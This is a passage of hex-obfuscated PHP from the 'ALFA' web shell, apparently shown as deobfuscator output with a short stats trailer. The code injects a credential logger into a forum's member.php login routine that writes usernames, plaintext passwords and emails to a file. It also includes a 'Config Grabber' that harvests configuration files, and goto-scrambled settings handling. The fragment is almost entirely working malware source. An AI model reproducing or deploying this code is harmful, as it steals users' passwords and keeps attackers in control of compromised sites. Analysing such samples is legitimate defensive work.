"\x24\x61\x6c\146\141\x5f\x71\x20\75\x20\x24\144\x62\x2d\x3e\x71\x75\x65\x72\x79\50\x22\123\105\x4c\x45\x43\124\x20\x60\x65\155\x61\x69\154\x60\40\106\x52\x4f\115\x20\42\56\124\x41\x42\114\105\137\x50\122\x45\106\111\x58\x2e\x22\x75\x73\x65\x72\x73\40\x57\x48\105\x52\x45\40\140\x75\163\145\x72\x6e\141\155\145\140\x20\x3d\x20\47\x22\56\44\165\x73\x65\x72\x5b\x27\165\163\x65\162\x6e\141\x6d\x65\47\x5d\x2e\x22\47\x22\51\73\x24\x61\x6c\x66\x61\137\x66\145\164\x63\150\x20\75\x20\44\144\x62\55\x3e\x66\x65\164\x63\150\137\141\x72\162\141\171\x28\x24\x61\x6c\x66\141\137\x71\x29\73\44\141\x6c\146\141\137\x66\x69\x6c\145\x20\x3d\x20\42\173\x73\x61\x76\145\x74\x6f\137\x70\x61\x74\150\x7d\x22\x3b\44\146\160\40\75\x20\100\146\157\160\x65\x6e\50\x24\x61\154\146\141\137\x66\151\154\x65\x2c\x20\42\x61\x2b\x22\51\73\x40\x66\x77\162\x69\x74\145\x28\x24\146\160\x2c\40\x24\165\163\145\162\133\x27\165\x73\145\162\x6e\141\155\x65\x27\135\x2e\x22\x20\72\x20\x22\x2e\x20\44\165\x73\145\162\133\47\x70\x61\x73\x73\167\157\162\x64\x27\x5d\56\42\40\50\x20\42\x2e\44\x61\154\x66\141\137\x66\145\164\x63\x68\x5b\47\x65\x6d\141\151\154\47\x5d\x2e\x22\40\51\134\x6e\x22\x29\73\x40\146\143\154\x6f\163\145\50\x24\146\160\51\x3b\x24\x66\40\x3d\x20\x40\146\x69\154\x65\x28\44\x61\x6c\x66\x61\137\x66\151\154\145\x29\73\44\156\x65\x77\x20\x3d\x20\141\x72\x72\141\171\x5f\x75\x6e\151\161\165\x65\x28\44\146\x29\73\x24\x66\160\40\75\x20\100\x66\157\160\145\156\x28\x24\x61\x6c\x66\141\137\146\x69\154\145\54\40\x22\x77\x22\51\73\x66\157\x72\145\141\x63\150\50\44\156\x65\167\x20\x61\163\40\x24\166\x61\154\x75\145\163\51\173\x40\146\x77\x72\151\x74\145\50\44\x66\160\54\x20\44\166\141\154\165\x65\163\51\73\175\100\x66\143\x6c\157\x73\145\x28\44\x66\160\x29\x3b"; $find = "\x24\154\x6f\147\151\x6e\150\141\x6e\144\154\x65\162\x2d\x3e\x63\157\x6d\160\154\145\x74\x65\x5f\x6c\x6f\147\151\156\50\51\x3b"; $code = str_replace("\173\163\141\166\145\164\x6f\137\160\x61\x74\x68\x7d", $saveto, $code); $login = $path . "\x2f\155\x65\x6d\142\145\162\56\160\150\x70"; $evil_login = "\11" . $code . "\12\11" . $find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L8sC_; dptXn: if (!function_exists("\155\x62\137\163\164\162\154\x65\x6e")) { function mb_strlen($str, $c = '') { return strlen($str); } } goto JM3pb; P95rf: function alfaconfig_grabber() { alfahead(); echo "\74\144\151\x76\40\x63\x6c\141\x73\x73\75\150\x65\x61\144\x65\x72\76\x3c\x63\145\x6e\x74\x65\x72\76\x3c\x70\76\74\x64\x69\x76\x20\143\x6c\x61\163\163\75\42\164\x78\x74\x66\x6f\x6e\x74\x5f\150\x65\141\x64\145\162\42\76\x7c\40\x43\157\x6e\x66\x69\x67\x20\107\x72\141\142\142\145\x72\40\x7c\x3c\57\x64\151\x76\76\x3c\x2f\x70\76"; echo "\x3c\146\x6f\x72\155\40\x6e\x61\155\145\x3d\x22\163\162\x63\x68\x22\x20\157\156\123\165\142\x6d\151\164\x3d\42\x67\50\47\x63\157\x6e\x66\x69\x67\x5f\x67\162\141\142\x62\x65\162\47\x2c\156\x75\x6c\154\54\156\x75\154\154\x2c\164\150\x69\x73\56\144\151\x72\x2e\166\141\x6c\x75\x65\54\164\x68\x69\163\56\x65\x78\164\56\166\141\154\x75\x65\54\x6e\165\x6c\x6c\x2c\47\x3e\x3e\47\51\73\x72\x65\x74\165\162\x6e\40\146\141\154\163\x65\x3b\42\x20\x6d\145\x74\x68\x6f\144\x3d\47\160\x6f\163\x74\x27\76\xa\x9\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\x74\x78\164\146\x6f\x6e\x74\42\x3e\xa\11\104\x69\x72\x3a\x20\x3c\x69\x6e\x70\165\x74\40\x73\151\x7a\x65\75\42\65\x30\42\x20\x69\x64\75\x22\164\141\162\x67\145\x74\42\x20\164\171\160\145\x3d\42\164\145\170\164\x22\40\x6e\x61\x6d\x65\x3d\x22\144\x69\x72\x22\x20\x76\x61\154\165\145\x3d\42" . $GLOBALS["\x63\x77\x64"] . "\42\x3e\12\11\105\170\x74\72\40\x3c\163\155\141\154\x6c\x3e\74\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\75\42\162\x65\144\x22\x3e\133\40\52\x20\75\x20\x61\x6c\154\40\105\x78\x74\40\x5d\x3c\57\146\x6f\x6e\x74\76\x3c\57\x73\155\141\x6c\154\x3e\x20\x3c\151\156\160\x75\164\40\x69\144\75\x22\x65\170\164\42\40\x73\164\x79\154\145\x3d\42\164\x65\x78\x74\x2d\x61\x6c\151\147\156\x3a\x63\145\156\164\x65\x72\73\42\x20\164\171\160\x65\x3d\x22\x74\145\x78\164\x22\x20\156\x61\155\x65\x3d\x22\x65\170\x74\42\x20\163\x69\172\x65\75\x22\65\42\x20\166\x61\x6c\165\x65\x3d\x22\x70\x68\x70\x22\76\12\11\74\151\x6e\160\x75\x74\x20\164\x79\x70\145\75\x22\x73\x75\x62\x6d\x69\x74\x22\x20\156\x61\x6d\145\75\42\x62\x74\x6e\x22\x20\x76\141\x6c\165\145\x3d\42\40\x22\76\x3c\57\x64\151\x76\x3e\x3c\57\146\157\x72\x6d\76\x3c\57\x63\145\x6e\x74\145\x72\76\74\x62\162\76"; $dir = $_POST["\141\154\146\141\62"]; $ext = $_POST["\x61\x6c\x66\x61\x33"]; if ($_POST["\141\154\146\x61\x35"] == "\x3e\76") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "\74\x2f\144\151\x76\76"; alfafooter(); } goto RiRhw; FN_bJ: if ($GLOBALS["\143\x77\144"][strlen($GLOBALS["\x63\x77\x64"]) - 1] != "\x2f") { $GLOBALS["\143\167\x64"] .= "\x2f"; } goto jL3tA; r05Ia: foreach ($GLOBALS["\x44\102\x5f\116\101\115\x45"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "\x75\x73") { $GLOBALS["\x44\102\x5f\x4e\x41\x4d\105"]["\x75\163\145\x72"] = $value; $GLOBALS["\104\102\x5f\116\101\115\105"]["\x75\x73\x65\162\137\x72\x61\x6e\x64"] = $key; } elseif ($prefix == "\x70\x61") { $GLOBALS["\x44\x42\x5f\116\101\x4d\105"]["\x70\141\x73\x73"] = $value; $GLOBALS["\104\102\137\x4e\101\115\x45"]["\160\141\163\x73\x5f\x72\x61\x6e\x64"] = $key; } elseif ($prefix == "\x73\141") { $GLOBALS["\x44\102\137\x4e\101\x4d\105"]["\x73\x61\146\145\155\x6f\144\145"] = $value; $GLOBALS["\104\102\137\x4e\101\x4d\105"]["\163\x61\x66\x65\x6d\157\x64\x65\137\162\141\156\144"] = $key; } elseif ($prefix == "\154\x6f") { $GLOBALS["\x44\102\x5f\116\101\115\x45"]["\154\x6f\x67\x69\x6e\137\160\141\x67\x65"] = $value; $GLOBALS["\x44\x42\x5f\x4e\101\115\x45"]["\x6c\x6f\x67\151\156\137\x70\141\147\145\137\x72\141\156\144"] = $key; } elseif ($prefix == "\163\x68") { $GLOBALS["\104\x42\x5f\116\x41\115\105"]["\163\150\157\167\x5f\x69\x63\x6f\x6e\x73"] = $value; $GLOBALS["\x44\x42\x5f\116\x41\x4d\x45"]["\163\x68\157\x77\137\x69\x63\157\156\x73\x5f\162\141\156\x64"] = $key; } elseif ($prefix == "\x70\x6f") { $GLOBALS["\x44\102\x5f\x4e\x41\x4d\105"]["\160\157\163\164\x5f\145\x6e\143\162\x79\x70\x74\x69\x6f\156"] = $value; $GLOBALS["\104\102\137\116\101\115\x45"]["\x70\157\x73\164\x5f\145\x6e\143\162\x79\x70\164\151\157\156\137\162\x61\x6e\x64"] = $key; } elseif ($prefix == "\x63\x67") { $GLOBALS["\x44\102\137\116\x41\115\105"]["\x63\x67\x69\x5f\x61\160\151"] = $value; $GLOBALS["\104\102\x5f\x4e\x41\x4d\105"]["\143\x67\x69\x5f\141\x70\x69\x5f\x72\141\156\x64"] = $key; } } goto GuGa9; qyBzk: ?>

Function Calls

None

Variables

None

Stats

MD5 73ca466eb92a91c6b376d57c96c83aea
Eval Count 0
Decode Time 98 ms